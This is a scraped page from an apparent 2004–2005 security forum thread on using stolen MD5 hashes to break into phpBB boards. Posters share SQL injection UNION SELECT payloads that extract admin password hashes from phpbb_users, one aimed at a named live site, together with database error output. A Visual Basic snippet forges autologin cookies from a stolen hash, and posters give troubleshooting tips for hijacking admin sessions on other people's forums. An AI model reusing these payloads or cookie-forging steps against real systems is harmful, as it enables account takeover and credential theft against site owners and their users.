Waraxe IT Security Portal
Login or Register
December 3, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 59
Members: 0
Total: 59
Full disclosure
Microsoft Warbird and PMP security research - technical doc
Access Control in Paxton Net2 software
SEC Consult SA-20241127-0 :: Stored Cross-Site Scripting in Omada Identity (CVE-2024-52951)
SEC Consult SA-20241125-0 :: Unlocked JTAG interface and buffer overflow in Siemens SM-2558 Protocol Element, Siemens CP-2016 & CP-2019
Re: Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> How to use gathered md5 hash? Step-by-step tutorial 4 n00bs Goto page Previous1, 2, 3, 4, 5Next
Post new topicReply to topic View previous topic :: View next topic
yes
PostPosted: Sat Jul 24, 2004 1:29 am Reply with quote
l3az3ouze
Beginner
Beginner
Joined: Jul 23, 2004
Posts: 2




i used to try this SQL vuln, in many phpbb websites, but i found that when i'm usin a normal user md5 it works 100%, but when i'm using an Admin md5 pass in the cookies, it doesn't log me in!!!!!
maybe there is a second username or password, isn't it?
View user's profile Send private message
PostPosted: Sat Jul 24, 2004 9:25 am Reply with quote
zer0-c00l
Advanced user
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




Code:
Could not query private message post information

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 272 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 272 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 247
File : /home/********/public_html/forum/privmsg.php



????
View user's profile Send private message
PostPosted: Sun Jul 25, 2004 12:23 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Seems like modified sql query. Try to add "null"-s one-by-one, till you stop have getting error message "different count of columns".
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Sep 12, 2004 3:12 pm Reply with quote
dj_wolf
Beginner
Beginner
Joined: Sep 05, 2004
Posts: 2




what mean this word in text and how can get uidsize :
Dim uidsize As String
Dim uid As String
Dim md5hash As String

Private Sub Command1_Click()
uid = Text1.Text
uidsize = Len(uid)
md5hash = Text2.Text

Text3.Text = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22" + md5hash + "%22%3Bs%3A6%3A%22userid%22%3Bs%3A" + uidsize + "%3A%22" + uid + "%22%3B%7D"
End Sub

_________________
dsfdsf
View user's profile Send private message Yahoo Messenger
PostPosted: Mon Sep 13, 2004 4:20 am Reply with quote
morrowasted
Regular user
Regular user
Joined: Sep 06, 2004
Posts: 10




Can this exploit also be used for XMB?

_________________
I'm new to all this, sorry for my dumbness.
View user's profile Send private message AIM Address
PostPosted: Mon Sep 13, 2004 7:49 pm Reply with quote
dj_wolf
Beginner
Beginner
Joined: Sep 05, 2004
Posts: 2




HI I DONT GET admin's md5 hasH PLZ HELP I USE THIS LINK BUT I DONT

I USE THIS LINK FOR SITE XXX AND GET ME THE TXT BUT I CANT REALEAS THE MD5 HASH BECAUSE EACH TIME GET ME THE OTHER MD5 HASH:


http://www.funiran.com/farsi-forum/search.php?search_id=1%20union%20select%%2020concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,11<br%20/>%205,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,11<br%20/>%201,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,<br%20/>%2059,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115<br%20/>%20,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,5<br%20/>%208,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59<br%20/>%20,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,9<br%20/>7,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[uid


RESULT:

SQL Error : 1064 You have an error in your SQL syntax near 'union select% 20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99' at line 3

SELECT search_array FROM phpbb_forumsearch_results WHERE search_id = 1 union select% 20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,11
5,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,11
1,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,
59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115
,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,5
8,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59
,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,9
7,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=[uid AND session_id = 'd5c932ff29bdc9cc2d018c811d494043'

_________________
dsfdsf
View user's profile Send private message Yahoo Messenger
PostPosted: Fri Oct 29, 2004 6:07 pm Reply with quote
zyon
Beginner
Beginner
Joined: Oct 28, 2004
Posts: 1




hi.
i hope i won't ask too much if i ask for more hints here.
how to provoke these various mysql error messages?
i really need help on this. Confused

waraxe wrote:
Well, you have sql injection case allready, if you see that error message. So try now to provoke various mysql error messages, and maybe one of them will reveal real table name...


kranium wrote:
well thx for your help, u rule

but one little question. I was trying using your knowledge but I've got this error:

Quote:
SQL Error : 1146 Table 'lusodemo.phpbb_users' doesn't exist


so it sems that this guys have some kind of prefix in their tables, and i can't figure it out

so, i ask if there's any way i can get the correct table (or the table list) of this forum, maybe using a SHOW TABLES (i tried it without success)...

if you can help with some magic query i'll be very gratefull Very Happy

sorry my bad english and keep your excelent work
View user's profile Send private message
Mozilla doesn't accept edited cookies
PostPosted: Thu Nov 11, 2004 9:08 am Reply with quote
Dieselboy
Beginner
Beginner
Joined: Nov 11, 2004
Posts: 1




..


Last edited by Dieselboy on Wed Jul 20, 2005 3:35 pm; edited 1 time in total

_________________
You will respect my authority!
View user's profile Send private message
PostPosted: Fri Apr 01, 2005 8:47 pm Reply with quote
TheRipper
Regular user
Regular user
Joined: Mar 25, 2005
Posts: 6




does it works with phpbb 2.0.13 ?? Rolling Eyes
View user's profile Send private message
PostPosted: Sat Apr 02, 2005 1:32 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Have not tested, but it will work, uneless phpbb developers are not taken some countermeasures Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 02, 2005 12:17 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




TheRipper wrote:
does it works with phpbb 2.0.13 ?? Rolling Eyes


if u can steal the admin ids Smile

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Apr 11, 2005 3:48 pm Reply with quote
TheRipper
Regular user
Regular user
Joined: Mar 25, 2005
Posts: 6




i have both Laughing (taken from an old database) but i don't know if the passw it's still the same Embarassed
View user's profile Send private message
PostPosted: Tue Apr 12, 2005 8:55 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




So wait a minute... Did someone just stumble across a 2.0.13 exploit or is it yet another false alarm? Sad

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 29, 2005 1:56 am Reply with quote
w00t
Beginner
Beginner
Joined: Apr 29, 2005
Posts: 1




Hey,

Ive been interested in this for a while, but its never worked for me. I can gain the hashes, edit all required information, but it just never logs me in, i always log in to my account.

Im thinking this may be because of updated version(s) or firefox (im running 2.0.3). Is there any browsers anyone can reccomend?
View user's profile Send private message
PostPosted: Fri May 20, 2005 8:20 am Reply with quote
Twinky
Regular user
Regular user
Joined: May 20, 2005
Posts: 5




i try this... but the md5 hashhes doesnt display in the url Confused
View user's profile Send private message
How to use gathered md5 hash? Step-by-step tutorial 4 n00bs
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 3 of 5
Goto page Previous1, 2, 3, 4, 5Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.050 Seconds